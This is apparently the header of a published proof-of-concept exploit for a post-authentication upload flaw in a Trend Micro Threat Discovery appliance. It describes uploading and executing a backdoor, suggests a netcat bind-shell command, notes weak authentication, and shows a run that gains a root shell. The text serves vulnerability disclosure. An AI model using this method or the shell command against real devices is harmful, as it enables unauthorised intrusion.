There exists a post authenticated upload vulnerability that can be used to execute arbitrary code.
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was
take command, upload bd, exec, read, rinse, repeat.
- You maybe can get a binded netcat using '`nc -e /bin/sh -lp 1337`' but this at times broke the cgi and the rest of the
log_query_system.cgi was unstable.
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...
saturn:trend_micro_threat_discovery_upload_rce mr_me$ ./
(+) usage: ./ <target> <pass>
(+) eg: ./ admin123
saturn:trend_micro_threat_discovery_upload_rce mr_me$ ./ admin123
(+) logged in...
(+) popping shell, type 'exit' to exit.
$ id
uid=0(root) gid=0(root)
$ uname -a
Linux localhost #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
$ pwd
$ exit
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